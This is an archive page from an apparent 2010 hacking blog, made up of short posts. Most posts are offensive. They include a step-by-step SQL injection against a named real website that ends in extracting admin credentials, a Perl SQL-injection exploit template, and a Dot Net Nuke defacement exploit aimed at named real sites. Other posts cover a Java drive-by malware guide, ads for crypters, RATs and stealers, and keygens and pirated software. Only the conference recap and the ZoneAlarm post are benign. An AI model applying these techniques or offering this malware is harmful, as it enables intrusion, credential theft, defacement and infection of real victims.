July 2010 | Learn Cyber Security

Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways



..................................................................................................................

Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways

Black Hat, the largest and most visible hacker conference, is winding down in Las Vegas. It always brings a series of shocks and this year didn't disappoint. What did we learn this year?

1. Your money isn't safe - Researcher Barnaby Jack demonstrated how to hack automated teller machines (ATMs). He did it both by physically opening the machine and installing malware on it and by compromising it over the network. It turns out these machines, or at least some of them, aren't all that aggressively secured.

2. Your cell phone isn't safe - It was a bad week for mobile security. Project Carmen Sandiego showed that you don't have to be a phone company or government to find out who's using a particular cell phone number or where they are located. The security company Lookout revealed that Android wallpaper applications are needlessly gathering personal data. For years mobile malware has been just over the horizon, but it seems to be closer than ever to being a real problem. F-Secure's Mikko Hypponen was quoted as saying "Eventually, virus writers will realize it is easier to make money by infecting phones than it is by infecting computers."

3. Your electric service isn't safe - Jonathan Pollet, founder of Red Tiger Security, told Black Hat attendees of the weaknesses in Supervisory Control And Data Acquisition (SCADA) systems used in utilities like power companies to manage and monitor equipment. SCADA vendors and users are way behind IT generally when it comes to security. Vulnerabilities go for long times unpatched. Unnecessary software, like chat clients, are used on critical systems, which are sometimes connected to the Internet. Pollet also warned of the weak security state of "smart meters" being rolled out all over the country.

4. Your home router isn't safe - A new trick found by researcher Craig Heffner makes it easier for attackers to gain usable access to your home network. Hacking into the router can be done in many ways, but once you're in it's hard to get an address on the internal network. Heffner showed a Javascript hack that allows an attacker to use DNS Rebiding to gain an internal address. There are mitigating measures you can take, but they're complex or inconvenient.

5. Black Hat itself isn't safe - For the first time this year, Black Hat made their sessions available through a video feed, using a 3rd party service, for a $395 fee. One subscriber realized that it was easy to trick the service into providing the videos for free. It's not a good thing to show weakness like this to the Black Hat crowd.

There was some good news at the show. To add on to their recent announcement of a sandbox architecture for Reader for Windows, Adobe announced that it will be joining in Microsoft's MAPP program to provide advance notice to security vendors of vulnerability disclosures. This should help users to protect themselves better.
####################################################
----------------------------------------------------------------------------------
..........................................................................................................
 


Read More Add your Comment 0 comments


XSSer Storm - Open Source Penetration testing tool



...............................................................................................

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports this new features:
-g DORK Process search engine dork results as target urls
(ex:inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle,
duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format

####################################################
----------------------------------------------------------------------------------
..........................................................................................................


Read More Add your Comment 0 comments


Download Free Keygen & Serial keys for all EA Games



.................................................................................................


Keygen & Serial keys for all EA Games Download Free | EA Keygen for Over 135 Games Including BF2142 | 5.5 MB

This is an insane keygen, it includes serials for over 135 games; including: All Battlefield Games ,Black And White ,Every C&C Game, All FIFA games, etc. This is a rare keygen as there are only a few floating around the net!

#######################################################
-------------------------------------------------------------------------------------------
..................................................................................................................


Read More Add your Comment 1 comments


Free Kaspersky Activation Key: Kaspersky All version Activation Key



......................................................................................................


Free Kaspersky Activation Key: Kaspersky All version Activation Key (30th July 10) | 5.61 MB


DOWNLOAD HERE
#######################################################
-------------------------------------------------------------------------------------------
..................................................................................................................


Read More Add your Comment 0 comments


The New Java Drive-By - Now supports .jpg, .gif, and .png!



.............................................................................................

[Image: t6yxhj.png]

Example:

Notes
Listen up, if you get any errors then look at the bottom of this post before even thinking of posting!

Introduction

Welcome to my new Java Drive-By! This drive by will allow you to be "legit". What do I mean by legit? Well I mean that if you say "Come look at my sexy slideshow! *link to site*". They will go there and see a slideshow and go, okay! Now you have infected them, but are still playing with them. Good luck and please read this full post,


What You Need


Before we get started you will need to get Java JDK to compile your .java.
You will also need some pics of a hot ass girl, which can be found anywhere on the internet today. You will also need these files (all available here):

Update.java (Client)
-

This is the main thing that will transfer your virus to their computer.


Slide.java (Slideshow)
-

The slideshow will be the one to make you seem "legit".


maker.bat (Makes .jar & sig)
-

Maker.bat will conver the .java -> .class -> .jar & sig. This is ment to make your life easier.


index.html (Main Page)
-

When they visit your site this is what they will see. This html file is the key to putting it all togethor.


Java Error

Quote:'javac' is not recognized as an internal or external command, operable program or batch file.

Easy fix. If you haven't already, download Java JDK. Once you have it installed follow the step provided below.

Step 1 - Go to Start > Control Panel > System > Advanced tab > Environment Variables > System variables > Path > Edit.


Step 2 - Add a ; at the very end followed by C:\Program Files\Java\JDK VERSION\bin.

[Image: qrgrba.png]

Step 3 - Done. Now try it again.

FAQ


Q.
Wont let me type, must be something wrong with the JDK I downloaded?
A.
Just type the password, it wont show you typing it. It will just sit there blinking, it's okay just type the password. If you can't get the password right try 123456. 
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................


Read More Add your Comment 0 comments


How to use SQL Injection? Best Online Tutorial for SQL Injection



...........................................................................................................................

How to use SQL Injection? Best Online Tutorial for SQL Injection
I receive many emails on how to hack a website using sql injection so, here is the hacking tutorial on it,
[NOTE: This is for educational purpose only.]

This is practical tutorial...! as long as this .pk site is up !

So lets start.. Hers is the website on which this live testing was done: http://www.depo.org.pk

Try to Find variables passing to inner script...

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Where &id= is variable passing values to sql

Check whether it is vulnerable or Not... Put ' in place of 1 as shown below

depo.org.pk/index.php?a=newsdetail&id='

If it shows error ! Then we can apply sqli on this URL. Now we need to determine numbers of columns in current table.

Increase numbers un-till u get rid of 'The used SELECT statements have a different number of columns

+1
+1,2
+1,2,3
+1,2.3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

 here we get  no error.

Here, we used SQL Functions directly from browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------


user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now, we need to know structure of victim's mysql database

NOTE: SQL stores each column and table information in another table called as 'information_schema'

Attach SQL Query '+from+information_schema.tables+where+table_schem a=database()' @ the ending of column numbers !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables
+where+table_
schema=database()

Now, we want to fatch table structure of database named as 'depo' !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()

Table names

admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now, its turn of column !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

Its time to fetch Id and password from Table Admin !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin

FOR EDUCATIONAL PURPOSES ONLY.
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................


Read More Add your Comment 0 comments


Recover Free RAR Password: RAR Password Recovery Magic



..............................................................................................

RAR Password Recovery Magic 6.1.1.320 | 1.7Mb

RAR Password Recovery Magic is a powerful tool designed to recover lost or forgotten passwords for a RAR/WinRAR archives. RAR Password Recovery Magic supports the customizable brute-force and dictionary-based attacks.RAR Password Recovery Magic has an easy to use interface. All you need to do to recover your password is just to add your file to the operation window.

Key Features:

- Recover passwords for RAR/WinRAR archives.
- Custom character set for "brute-force" attack supported.
- You can select character from a range of character options including:
- Letters, Numbers, symbol...
- Large wordlist dictionary.
- Work in the background.
- Features a user-friendly interface.

Download Links

http://hotfile.com/dl/58492469/d107754/RARPass.rar.html

http://www.fileserve.com/file/PzPJ589/RARPass.rar
##################################################3
-----------------------------------------------------------------------------------
........................................................................................................


Read More Add your Comment 0 comments


Free Premium RapidShare account | Hack Rapidshare: Rapidshare Hacking



Hack Rapidshare: Rapidshare Hacking | Timer count zero

Enter the script given below to address bar when Rapidshare time count starts ..
It will provide the direct download link.

javascript:var c=0

Premium RapidShare account, below is the list of all websites provide you free Premium RapidShare account.

As opposed to software, this web-based approach allows users to avoid the waiting times (and Captcha) by using someone else’s RapidShare Premium service. Basically it works like this: The website owns a valid RS Premium account (or many) and offers them to be used publicly - just throw in the RS link and you’ll be downloading wait-and-captcha free. The catch? In most cases you’ll be limited to how many links you can download in a 24-hour period (usually between 3 and 5). Thus, using a few of these sites in different browser tabs will obviously allow you to download multiple files simultaneously. Then again, I don’t see why you can’t use different proxies to trick ‘em into thinking you’re an entirely different user!

http://www.sonuhost.com — Allows for up to 3 RapidShare Links per day.
http://www.rapidshare.co.in — 5 per day.
http://www.rapidsharepremiumlinkgenerator.com/ — Limit not known.
http://www.rsfox.com — 5 per day. Has a MegaUpload and a Megarotic link generator as well.
http://www.veryrapidshare.com/PremiumDownload.aspx — 3 per day.
http://www.rsgenerator.net — 2 per day. Also has a MegaUpload link generator.
http://www.premify.com/rapidshare/index.php — 5 per day.
http://www.kingrapid.com — 3 Links per day.
http://megadl.info/rs/ — Not known.
http://vipdirectory.net — 5 Links per day.
http://www.rsdln.com/dl.html — 4 per day.
http://rhost.cz — 3 per day.
http://www.rapitshare.info — 5 per day.
http://www.rapidloader.info — 5 per day.
http://megaez.com — Unknown - no bandwidth available at time of test.
http://www.rapidfile.us — 5 per day.
http://freerslinks.com — Unknown - all slots for the day were gone at testing.
http://xuply.com/rs.php — Unknown.
http://www.rapidshare-premium.com — 10 per day.
http://www.rapiddownloader.info — 5 per day.
http://daiphyer.com/megaupload.com/premium/link/generator/megaupload.com — Unknown - for MegaUpload links only - users must be registered to use the service.
http://oregonpr.com — 15 per day.
http://hc-security.blogspot.com — Has a few different RS generators on site.
http://chauthanh.info/megaupload — 10 different mirrors on site - MegaUpload links only.
http://www.megauploadgenerator.com — MegaUpload links only.
http://freerapid.org — They have 12 different mirrors for this - each with varying allowances on how many files can be downloaded in a day. Here are the ones that we recommend:
-http://rsalmighty.com — 7 per day.
-http://freerapid.org/rapid8.html — 4 per day.
-http://freerapid.org/rapid2.html — 4 per day.
-http://freerapid.org/rapid3.html — 4 per day.
####################################################
-------------------------------------------------------------------------------------
.................................................................................................................


Read More Add your Comment 0 comments


credit card hacking



 .................................................................................................
lets checkit out
http://www.fakenamegenerator.com/gen-random-us-ca.php
####################################################
----------------------------------------------------------------------
.......................................................................................................


Read More Add your Comment 1 comments


Writing SQL Injection exploits in Perl



.................................................................................................................
[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …





—+— StArT
[1] Introduction
Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.
Example:
print “Insert the host to connect: “;
chomp ($host=);
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real hearth of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.
The SQL code must be treaty like a normal variable (like “$injection”).
Example:
$injection=index.php/forum?=[SQL_CODE]
This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.
Now we must create a piece of code that will go to inject this query into the host vuln.
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.
With the execution of this script we have made our injection.
Resume of the exploit:
use IO::Socket
print “Insert the host to connect: “;
chomp ($host=);
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
$injection=index.php/forum?=[SQL_CODE]
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection
A little trick:
Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }
This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.
Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.
##########################################
----------------------------------------------------------------------------
.................................................................................................


Read More Add your Comment 0 comments


[Download] The Hacker's Kit [Tools, Rats, Keyloggers, Stealers, Scanners]♣



The Hack Tools Compilation!
My Personnal Compilation


Batch

- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]

Binders

- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others

Crypters

- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Keyloggers

- Ardamax 2.8
- Ardamax 2.41

Nukers And Fl00ders

- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke

Port & IP Scanners

- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]

R.A.T.s

- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold

Sniffers

- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]

Stealers

- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3

Vulnerability Scanner and Exploiter

- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]

Website Exploit And SLQ Injections

- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]

Others

- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools
- Much more

###################################################3
--------------------------------------------------------------------------------------
.................................................................................................................


Read More Add your Comment 4 comments


[FUD][FREE] Rattus Crypter v1.1 [ULTIMATE STUBS]-Cybergate,Spy-Net,RATS SUPPORT




[Image: tapqie.png]


[Image: zn7a6t.png]



[Image: mvly1k.png]


Download Mirror #1


Download Mirror #2


Download Mirror #3






100% Undetected From ALL Anti-Virus Programs
ScanTime FUD
RunTime FUD


100% FUD

100% Undetected
100% Legit
100% Working with ALL RATS

Stealers

User/Pass Stealer
CD Key Stealer
Steam Stealer
App Key Stealer
Windows Key Stealer

Spread

P2P
USB
CD
Forum
Upload
Network

Miscellaneous
Anti-System
UAC Bypass
Fake Error
KeyLogger
Add to Startup
Downloader
Hide in TaskManager

Other

SMTP
Port
Email support
Icon changer
ALL RATS Support
And lots lots more.

Anti-System

AOL Active Virus Shield
Avast! Free Antivirus
Avast! Pro Antivirus and Internet Security
AVG Anti-Virus
AVG Anti-Virus Free
Avira AntiVir Personal - Free Antivirus
Avira AntiVir Premium
AVZ
BitDefender
BitDefender Free Edition
BullGuard
CA Anti-Virus
Clam AntiVirus
ClamWin
Comodo AntiVirus
Dr. Web
Dr. Web CureIt
ESET
F-Prot
F-Secure
Fortinet FortiClient End Point Security
G DATA Software
Graugon AntiVirus
Immunet Protect
Intego VirusBarrier
Kaspersky Anti-Virus
McAfee VirusScan
Microsoft Security Essentials
rman
Panda Antivirus
Panda Cloud Antivirus
PC Tools AntiVirus
PC Tools AntiVirus Free Edition
Quick Heal AntiVirus
Sophos Anti-Virus
Symantec rton AntiVirus/rton 360
Trend Micro Internet Security
Vba32Antivirus
Sunbelt Software VIPRE Antivirus + Antispyware
VirusBuster
ZoneAlarm Antivirus
INBATE AntiVirus
ALL OTHER LEADING ANTI-VIRUS/ANTI-MALWARE PROGRAMS*


[Video Tutorial On ] How To Bypass Sh.are.Cash
##############################################
---------------------------------------------------------------------------
........................................................................................................ 


Read More Add your Comment 0 comments


Download ZoneAlarm Extreme Security 2010



Download ZoneAlarm Extreme Security 2010

The ZoneAlarm Extreme Security package includes everything in ZoneAlarm Security Suite and integrates the comprehensive Web security features of ZoneAlarm ForceField, which includes anti-phishing and drive-by download protection, as well as Web site security detection, a privacy mode for shared computers, and more.The ZoneAlarm Internet Security Suite will not only eradicate threats but also prevent them from ever entering in the first place. Comprehensive protection defends your PC with robust firewall technology and stops identity thieves and spammers in a single, easy-to-use application.

ZoneAlarm ForceField application was created to be a lightweight software for your Web browser, designed to protect you from Web-based threats such as phishing and spy sites, theft, spyware downloads, and privacy invasions.
Here are some key features of "ZoneAlarm Extreme Security":

Antivirus:
· New engine delivers the best virus protection with significantly enhanced detection and removal capabilities. Hourly signature updates, expanded coverage, and faster detection to find and remove even the most recent and aggressive viruses.

Anti-Spyware:
· More robust detection and removal functions perform deeper scans at every level and purge spyware from your PC.

Anti-Spam & Anti-Phishing:
· Stops spam with automatic spam blocking that automatically adapts to the latest spamming techniques. Protects against phishing emails that attempt to steal your money or identity.

Identity Theft Protection :
· While ZoneAlarm continues to secure your identity information on your PC, these new Identity Theft Protection services also prevent identity theft over the Internet and even in the physical world.

Network and Program Firewall:
· Delivers proactive firewall protection with multiple layers of security that stop inbound, outbound, and program attacks while remaining completely invisible to hackers.

Operating System Firewall (OSFirewall):
· This additional layer of security prevents hard-to-remove spyware, including rootkits and kernel-level threats, from getting onto your PC and causing damage.

Auto-Learn:
· Allows hassle-free computer operation from the moment of installation by hiding unnecessary security alerts, thereby drastically reducing interruptions during the first two weeks as the product learns the programs you typically use. Automatically configures security settings, and rates threats according to level of potential damage they represent.

Game Mode:
· One-click control temporarily suppresses most security alerts and prevents them from interrupting your fun while maintaining maximum protection for your PC.

Wireless PC Protection:
· Automatically detects wireless networks and secures your PC from hackers and other Internet threats wherever you're connected - at home or on the road.

SmartDefense Service:
· Provides your PC with real-time security updates, improved response to breaking spyware threats, and new attack protection capabilities.

Superior Performance & Compatibility:
· Allows your PC to run quickly and smoothly.

Spy Site Blocking:
· Prevents spyware from getting on your PC by blocking its primary source: spyware distribution websites.

Privacy Protection:
· Manages and blocks pop-up ads, online profiling, cookies, cache, and scripts so you can surf in peace.

IM Protection:
· Protects your instant messages - even those sent between different services - so they can't be monitored.

Email Security:
· Quarantines suspicious attachments to help defend against unknown viruses; automatically halts outbound messages to keep you from accidentally infecting others.

Parental Control:
· Prevents children from viewing inappropriate content on Web sites.

Virtual Browsing:
· Builds a protective shield around your web browser. It creates a temporary clone of your browser so that anything you do on the web runs in a protected shell, sealed off from your PC.

Browser Threat Immunity:
· Immunizes your browser against security holes in Internet Explorer and Firefox. Prevents web sites from installing spyware and other malicious software onto your computer without your knowledge.

Private Browser:
· Erases all cache, cookies, history and passwords from the current session when you close the browser. This prevents the next person who uses the computer from seeing where you've been.

Keylogger & Screengrabber Jamming:
· Keeps your keystrokes and click trails private. Discovers and blocks silent spyware from stealing your identity.

Dangerous Download Detection:
· Detects dangerous downloads and alerts you to problems before they begin. You can download files safely, and free from worry that they might harm your computer.

Anti-Phishing:
· Click where you want, your personal information remains secure. Dual-engine anti-phishing identifies and stops fraudulent websites that trick you into revealing personal data.

Spy Site Blocking:
· Prevents spyware from infiltrating your PC by detecting and blocking websites known to distribute spyware.

Website Safety Check:
· Checks the credentials on every website you visit, so you know if the website is a safe place to enter data and download files.

Spyware Flushing:
· Auto-cleans your Web browser memory each time you close it, wiping away spyware and other dangers.

On-The-Fly Encryption:
· Temporary file encryption protects the data you enter online from spyware for an additional measure of security.

Seamless Integration:
· Compatible with all popular web browsers, including Internet Explorer and Firefox on XP and Vista.

Security Software Compatibility:
· Run ZoneAlarm ForceField with your current antivirus or security suite, for an essential level of critical web protection you would not have otherwise. It is compatible with all security software currently on the market.

Fast and Easy to Use:
· Installs in seconds and runs fast so it won't slow you down. You can surf the web like always, knowing your PC is protected. ZoneAlarm ForceField runs automatically, without any setup or training.

Requirements:

· 1 GHz or faster processor
· Minimum system RAM: 512 MB
· 250MB of available hard-disk space


#########################################################333
-----------------------------------------------------------------------------------------------------
.............................................................................................................................


Read More Add your Comment 0 comments


Learn How to hack websites Using DNN [Dot Net Nuke] Exploit



Hack Website Using DNN [Dot Net Nuke] Exploit

Using google DORK try to find the vulnerable website.

inurl:"/portals/0"

You can also modify this google dork according to your need & requirement

I have found these 2 website vulnerable to this attack:

http://www.wittur.se/
http://www.bsd405.org/

n00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg

Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site

After selecting the third option, replace the URL bar with below script

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT  you have hacked the website.




###############################################
---------------------------------------------------------------
.....................................................................................................


Read More Add your Comment 4 comments


Download Free Nero 9 All in one Pack 2010 Multilanguage Professional



...................................................................................................................................

Nero 9 All in one Pack 2010 Multilanguage Professional


Nero 9 All in one Pack 2010 Multilanguage | 780 MB


Nero 9 All in one Pack 2010 Multilanguage Professional


Nero 9 All in one Pack 2010 Multilanguage | 780 MB


Simply Create, Rip, Burn, Copy, Share, Backup, Play, and Enjoy
Nero 9 is the next generation of the world’s most trusted integrated digital media and home entertainment software suite. It features new cutting-edge functionality that makes enjoying digital media content simple.
This easy-to-use yet powerful multimedia suite, gives you the freedom to create, rip, copy, burn, edit, share, and upload online. Whatever you want – music, video, photo, and data – enjoy and share with family and friends anytime, anywhere.
With easy-to-use Nero StartSmart command center, your digital life has never been more flexible, feasible, and fun.


Nero 9 - is a set of software digital media and home entertainment center the next generation, which is the most trusted in the world. It features new cutting-edge functionality that makes enjoying digital media content simple. This easy-to-use yet powerful multimedia suite, gives you the freedom to create, read, copy, record, edit, share and upload online. Whatever it was - music, video, photo, and data - enjoy and share with family and friends anytime, anywhere
Developer: Nero AG
Language: Multi (Russian is present)
Tabletka: Present
Compatibility with Vista: complete


System requirements:
* Required for installation DVD-ROM
* Windows ? XP SP2 or SP3, Windows Vista ?, Windows Vista ? with a package installed SP1 or SP2, Windows ? 7, Windows ? XP Media Center Edition 2005 SP2
* Windows ? XP and 64-bit version of Windows Vista ?, as well as 64-bit version of Windows ? 7 are supported in emulation mode 32-bit version of
* Nero DiscCopy Gadget works only in emulation mode 32-bit version in the sidebar Sidebar in 64-bit versions of Windows Vista ?, or Desktop Gadget in 64 versions of Windows ? 7.
* Windows ? Internet Explorer ? 6,0 or next version
* 1 GHz Intel ? Pentium ? III or equivalent AMD-processor and Intel ? (2 GHz Intel ? Pentium ? 4 or equivalent AMD and Intel ? processor forWindows Vista ?, Windows ? 7), 256 MB RAM (512 MB RAM for Windows Vista ?, Windows ? 7)
* 1,8 GB hard disk space for typical installation of all components
* Recordable or rewritable drive for burning CD-, DVD-or Blu-ray Disc
* DirectX ? 9,0 c revision 30 (August 2006) or the next version
* Up to 9 GB available hard disk space for DVD images and temporary DVD files
* Graphics card with at least 32 MB video memory and minimum resolution of 800 x 600 pixels and 16-bits color setting (recommended 24-bit or 32-bit)
* It is strongly recommended to install the latest WHQL-certified device drivers.
* For online services Nero: to register Nero, update, activation, service Gracenote ?, online backup Nero and other features (such as photo sharing) requires an Internet connection.
* Nero recommends a broadband connection (DSL-1000 and higher or Internet connection with equivalent performance) for all online services, Nero, such as Nero Online Backup and Nero Video Services


The collection:
- Nero 9.4.26.0
- Nero BackItUp & Burn 1.2.17b
- Nero Move it 1.5.10.0
- Nero MediaHome 4.4.26.3
- Templates
- Nero InCD 6.6.5100
- LightScribe Software
- Activation
- Help Files
- How to install.txt


